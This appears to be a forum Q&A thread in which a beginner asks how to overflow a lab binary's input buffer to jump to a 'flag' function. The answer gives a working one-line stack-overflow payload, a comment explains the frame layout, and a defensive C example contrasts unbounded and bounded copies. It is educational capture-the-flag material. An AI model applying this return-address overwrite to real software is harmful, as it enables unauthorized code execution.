
I'm an absolute newbie when it comes to all this side of reverse engineering. Each time I try and understand it, I get lost almost immediately.

I am trying a lab. I open it up in Binary Ninja. I get the following

[screenshot]

When I open main I get the following

[screenshot]

Nothing much seems to happen but there is a function(?) called flag that looks like what I need

[screenshot]

When I copy the address, it comes out as:

0x401152

I'm trying to do stuff like this on the command line but getting nowhere fast

python3 -c "print (28 * 'A' + '\x52\x11\x40')" | ./santa;

I then try to iterate through, with no luck, although I do get a segmentation fault on the 53rd iteration

for i in {0..60}; do python3 -c "print ($i * 'A' + '\x52\x11\x40')" | ./santa; done

Any pointers? I'm absolutely lost

  • Hi, generally we recommend pasting text as text, not screenshots. The reason being that search engines won't index screenshots the same way as text. Commented Dec 16, 2021 at 9:59

1 Answer

python3 -c "print (56 * 'A' + '\x53\x11\x40\x00\x00\x00\x00\x00')" | ./santa
  • Would you care to elaborate on your solution? Commented Nov 30, 2021 at 8:22
  • Basically they are overflowing the buffer that scanf was entering into. After overflowing out of that buffer they will then be filling the saved frame pointer with garbage, after which in the stack comes the return address. So once the function hits retn it'll jump to the new address they set, 0x401152. Commented Apr 9, 2023 at 16:57
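To make the frame layout in the comment above concrete from the defensive side, here is an added C example (not the lab's code and not from the answerer) that puts the unbounded scanf("%s")-style copy next to a bounded copy that reports truncation. The 48-byte buffer size is an assumption, chosen so that buffer plus the 8-byte saved rbp equals the 56 bytes of padding the answer uses before the return address.

```c
#include <stdio.h>
#include <string.h>

/* Assumed sizes: a 48-byte buffer followed by the 8-byte saved rbp gives
 * the 56 bytes of padding the answer places before the return address. */
#define BUF_SIZE 48
#define SAVED_RBP_SIZE 8

/* Frame layout from the comment, low to high address: [buf][saved rbp][ret].
 * Returns how many bytes of input land before the saved return address. */
size_t return_address_offset(size_t buf_size) {
    return buf_size + SAVED_RBP_SIZE;
}

/* Vulnerable pattern, equivalent to scanf("%s", buf): no bound, so input
 * longer than BUF_SIZE runs over the saved rbp and then the return address.
 * Kept only for contrast; this example never feeds it long input. */
void greet_unbounded(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);
    printf("hello %s\n", buf);
}

/* Hardened form: copy at most buf_size-1 bytes, always NUL-terminate, and
 * report truncation so the caller can reject over-long input instead of
 * silently accepting it. The scanf equivalent is a width: scanf("%47s", buf). */
int copy_bounded(char *buf, size_t buf_size, const char *input) {
    size_t len = strlen(input);
    int truncated = len >= buf_size;
    size_t n = truncated ? buf_size - 1 : len;
    memcpy(buf, input, n);
    buf[n] = '\0';
    return truncated;
}

/* Constructed over-long input (70 'A's, past the 56-byte offset): returns
 * how many bytes the hardened copy kept, i.e. BUF_SIZE minus the terminator. */
size_t bounded_copy_of_long_input(void) {
    char input[71];
    char buf[BUF_SIZE];
    memset(input, 'A', 70);
    input[70] = '\0';
    copy_bounded(buf, sizeof buf, input);
    return strlen(buf);
}

int main(void) {
    printf("return address is %zu bytes into the input; bounded copy kept %zu bytes\n",
           return_address_offset(BUF_SIZE), bounded_copy_of_long_input());
    greet_unbounded("santa"); /* short input only */
    return 0;
}
```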
